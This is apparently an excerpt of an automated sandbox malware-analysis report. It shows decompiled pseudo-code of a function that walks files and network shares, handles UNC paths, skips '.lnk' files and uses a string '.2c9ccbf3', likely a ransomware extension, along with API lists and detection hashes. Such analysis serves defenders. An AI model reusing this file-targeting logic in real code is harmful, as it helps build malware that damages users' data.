                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree_swprintf
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 3639372079-3269262987
                                                                                        • Opcode ID: 84f8500ff7b27c632c9b9271ce9a8f5ba679a93e4dab81cca705355d04b078e7
                                                                                        • Instruction ID: b976fa9e67b8a3228700ecdf3256604b03e66e09c4257d112e81dcf9821a38e6
                                                                                        • Opcode Fuzzy Hash: 84f8500ff7b27c632c9b9271ce9a8f5ba679a93e4dab81cca705355d04b078e7
                                                                                        • Instruction Fuzzy Hash: 18E01DB22452087FF2202B56FD4AE777F1CDB81765B104137F504B04B2D5721D19957D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00408C93, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20memorynetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E00408C93() {
				signed int _t54;
				WCHAR* _t55;
				int _t56;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t66;
				WCHAR* _t68;
				WCHAR* _t76;
				WCHAR* _t77;
				WCHAR* _t78;
				intOrPtr* _t79;
				WCHAR* _t80;
				wchar_t* _t83;
				wchar_t* _t84;
				WCHAR* _t85;
				short* _t86;
				void* _t87;
				void* _t89;

				while(1) {
					_t54 = GetFileAttributesW( *(_t87 - 8));
					if(_t54 == 0xffffffff) {
						break;
					}
					__eflags = _t54 & 0x00000010;
					if((_t54 & 0x00000010) != 0) {
						_t55 = PathIsNetworkPathW( *(_t87 - 8));
						__eflags = _t55;
						if(_t55 == 0) {
							L44:
							__eflags =  *0x40f5a2;
							if(__eflags != 0) {
								E004039E3(__eflags, ".2c9ccbf3");
							}
							_t56 = E00407D2C( *(_t87 - 4),  *(_t87 - 8));
							L47:
							return _t56;
						}
						__eflags =  *(_t87 - 8) - 0x5c005c;
						if( *(_t87 - 8) != 0x5c005c) {
							goto L44;
						}
						_t56 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen( *(_t87 - 8)) * 2);
						_t83 = _t56;
						__eflags = _t83;
						if(_t83 != 0) {
							 *_t83 = 0x5c005c;
							_t83[1] = 0x5c003f;
							_t83[2] = 0x4e0055;
							_t83[3] = 0x5c0043;
							wcscat(_t83,  &(( *(_t87 - 8))[2]));
							RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
							 *(_t87 - 8) = _t83;
							__eflags =  *0x40f5e6;
							if( *0x40f5e6 == 0) {
								__eflags =  *0x40f5ea;
								if( *0x40f5ea != 0) {
									_t65 =  *0x40f5ea; // 0x0
									 *(_t87 - 4) = _t65;
								}
							} else {
								_t66 =  *0x40f5e6; // 0x0
								 *(_t87 - 4) = _t66;
							}
							while(1) {
								_t64 = E0040303D( *(_t87 - 4),  *(_t87 - 8));
								__eflags = _t64;
								if(_t64 != 0) {
									break;
								}
								_t56 = E004030A1( *(_t87 - 8));
								__eflags = _t56;
								if(_t56 == 0) {
									goto L47;
								}
							}
							_t50 = _t87 - 8;
							 *_t50 =  &(( *(_t87 - 8))[4]);
							__eflags =  *_t50;
							goto L44;
						}
						goto L47;
					}
					_t86 = PathFindExtensionW( *(_t87 - 8));
					__eflags =  *_t86;
					if( *_t86 == 0) {
						L14:
						_t68 = PathIsNetworkPathW( *(_t87 - 8));
						__eflags = _t68;
						if(_t68 == 0) {
							L27:
							__eflags =  *0x40f5a2;
							if(__eflags != 0) {
								E004039E3(__eflags, ".2c9ccbf3");
							}
							_t56 = E00407D2C( *(_t87 - 4),  *(_t87 - 8));
							goto L47;
						}
						_t56 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen( *(_t87 - 8)) * 2);
						_t84 = _t56;
						__eflags = _t84;
						if(_t84 != 0) {
							 *_t84 = 0x5c005c;
							_t84[1] = 0x5c003f;
							_t84[2] = 0x4e0055;
							_t84[3] = 0x5c0043;
							wcscat(_t84,  &(( *(_t87 - 8))[2]));
							RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
							 *(_t87 - 8) = _t84;
							__eflags =  *0x40f5e6;
							if( *0x40f5e6 == 0) {
								__eflags =  *0x40f5ea;
								if( *0x40f5ea != 0) {
									_t77 =  *0x40f5ea; // 0x0
									 *(_t87 - 4) = _t77;
								}
							} else {
								_t78 =  *0x40f5e6; // 0x0
								 *(_t87 - 4) = _t78;
							}
							while(1) {
								_t76 = E0040303D( *(_t87 - 4),  *(_t87 - 8));
								__eflags = _t76;
								if(_t76 != 0) {
									break;
								}
								_t56 = E004030A1( *(_t87 - 8));
								__eflags = _t56;
								if(_t56 == 0) {
									goto L47;
								}
							}
							_t29 = _t87 - 8;
							 *_t29 =  &(( *(_t87 - 8))[4]);
							__eflags =  *_t29;
							goto L27;
						}
						goto L47;
					}
					_t79 = _t87 - 0x16;
					 *_t79 = 0x6c002e;
					 *((intOrPtr*)(_t79 + 4)) = 0x6b006e;
					 *((short*)(_t79 + 8)) = 0;
					_t80 =  *0x40f694(_t86, _t79);
					_t89 = _t89 + 8;
					__eflags = _t80;
					if(_t80 != 0) {
						goto L14;
					}
					_t56 = E00403BB0( *(_t87 - 8));
					_t85 = _t56;
					__eflags = _t85;
					if(__eflags != 0) {
						RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
						 *(_t87 - 8) = _t85;
						continue;
					}
					goto L47;
				}
				_t56 = PathIsUNCServerW( *(_t87 - 8));
				if(_t56 != 0) {
					_t97 =  *0x40f5a2;
					if( *0x40f5a2 != 0) {
						E004039E3(_t97, ".2c9ccbf3");
					}
					_t56 = E00407B27( *(_t87 - 8));
				}
				goto L47;
			}





















                                                                                        0x00408cc2
                                                                                        0x00408cc5
                                                                                        0x00408cce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408cfd
                                                                                        0x00408d02
                                                                                        0x00408e60
                                                                                        0x00408e66
                                                                                        0x00408e68
                                                                                        0x00408f37
                                                                                        0x00408f37
                                                                                        0x00408f3e
                                                                                        0x00408f45
                                                                                        0x00408f45
                                                                                        0x00408f50
                                                                                        0x00408f55
                                                                                        0x00408f58
                                                                                        0x00408f58
                                                                                        0x00408e6e
                                                                                        0x00408e75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408e97
                                                                                        0x00408e9d
                                                                                        0x00408e9f
                                                                                        0x00408ea1
                                                                                        0x00408ea8
                                                                                        0x00408eae
                                                                                        0x00408eb5
                                                                                        0x00408ebc
                                                                                        0x00408ecb
                                                                                        0x00408edf
                                                                                        0x00408ee5
                                                                                        0x00408ee8
                                                                                        0x00408eef
                                                                                        0x00408efb
                                                                                        0x00408f02
                                                                                        0x00408f04
                                                                                        0x00408f09
                                                                                        0x00408f09
                                                                                        0x00408ef1
                                                                                        0x00408ef1
                                                                                        0x00408ef6
                                                                                        0x00408ef6
                                                                                        0x00408f0c
                                                                                        0x00408f12
                                                                                        0x00408f17
                                                                                        0x00408f19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408f22
                                                                                        0x00408f27
                                                                                        0x00408f29
                                                                                        0x00000000
                                                                                        0x00408f2f
                                                                                        0x00408f2b
                                                                                        0x00408f33
                                                                                        0x00408f33
                                                                                        0x00408f33
                                                                                        0x00000000
                                                                                        0x00408f33
                                                                                        0x00000000
                                                                                        0x00408ea3
                                                                                        0x00408d11
                                                                                        0x00408d13
                                                                                        0x00408d17
                                                                                        0x00408d6a
                                                                                        0x00408d6d
                                                                                        0x00408d73
                                                                                        0x00408d75
                                                                                        0x00408e3a
                                                                                        0x00408e3a
                                                                                        0x00408e41
                                                                                        0x00408e48
                                                                                        0x00408e48
                                                                                        0x00408e53
                                                                                        0x00000000
                                                                                        0x00408e53
                                                                                        0x00408d97
                                                                                        0x00408d9d
                                                                                        0x00408d9f
                                                                                        0x00408da1
                                                                                        0x00408da8
                                                                                        0x00408dae
                                                                                        0x00408db5
                                                                                        0x00408dbc
                                                                                        0x00408dcb
                                                                                        0x00408ddf
                                                                                        0x00408de5
                                                                                        0x00408de8
                                                                                        0x00408def
                                                                                        0x00408dfb
                                                                                        0x00408e02
                                                                                        0x00408e04
                                                                                        0x00408e09
                                                                                        0x00408e09
                                                                                        0x00408df1
                                                                                        0x00408df1
                                                                                        0x00408df6
                                                                                        0x00408df6
                                                                                        0x00408e0c
                                                                                        0x00408e12
                                                                                        0x00408e17
                                                                                        0x00408e19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408e22
                                                                                        0x00408e27
                                                                                        0x00408e29
                                                                                        0x00000000
                                                                                        0x00408e2f
                                                                                        0x00408e2b
                                                                                        0x00408e36
                                                                                        0x00408e36
                                                                                        0x00408e36
                                                                                        0x00000000
                                                                                        0x00408e36
                                                                                        0x00000000
                                                                                        0x00408da3
                                                                                        0x00408d19
                                                                                        0x00408d1c
                                                                                        0x00408d22
                                                                                        0x00408d29
                                                                                        0x00408d31
                                                                                        0x00408d37
                                                                                        0x00408d3a
                                                                                        0x00408d3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00408d41
                                                                                        0x00408d46
                                                                                        0x00408d48
                                                                                        0x00408d4a
                                                                                        0x00408d5c
                                                                                        0x00408d62
                                                                                        0x00000000
                                                                                        0x00408d62
                                                                                        0x00000000
                                                                                        0x00408d4c
                                                                                        0x00408cd3
                                                                                        0x00408cdb
                                                                                        0x00408cdd
                                                                                        0x00408ce4
                                                                                        0x00408ceb
                                                                                        0x00408ceb
                                                                                        0x00408cf3
                                                                                        0x00408cf3
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000), ref: 00408CC5
                                                                                        • PathIsUNCServerW.SHLWAPI(00000000), ref: 00408CD3
                                                                                        • PathFindExtensionW.SHLWAPI(00000000), ref: 00408D0B
                                                                                        • _wcsicmp.NTDLL ref: 00408D31
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408D5C
                                                                                        • PathIsNetworkPathW.SHLWAPI(00000000), ref: 00408D6D
                                                                                        • wcslen.NTDLL ref: 00408D7E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408D97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Path$Heap$AllocateAttributesExtensionFileFindFreeNetworkServer_wcsicmpwcslen
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 618392986-3269262987
                                                                                        • Opcode ID: a012caf977fb2c86210e35754b7c8f841d14fda69e372c7a0dd1edca875ad39e
                                                                                        • Instruction ID: e1610dc7eb3bada1d9e06009aa20c081853d766bd444b5e13b74853a5dfabee6
                                                                                        • Opcode Fuzzy Hash: a012caf977fb2c86210e35754b7c8f841d14fda69e372c7a0dd1edca875ad39e
                                                                                        • Instruction Fuzzy Hash: BEE04F3050A109A6EB212B60AF06A6E7E319B00314F20427FE552B05E3CF3D495AB62E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%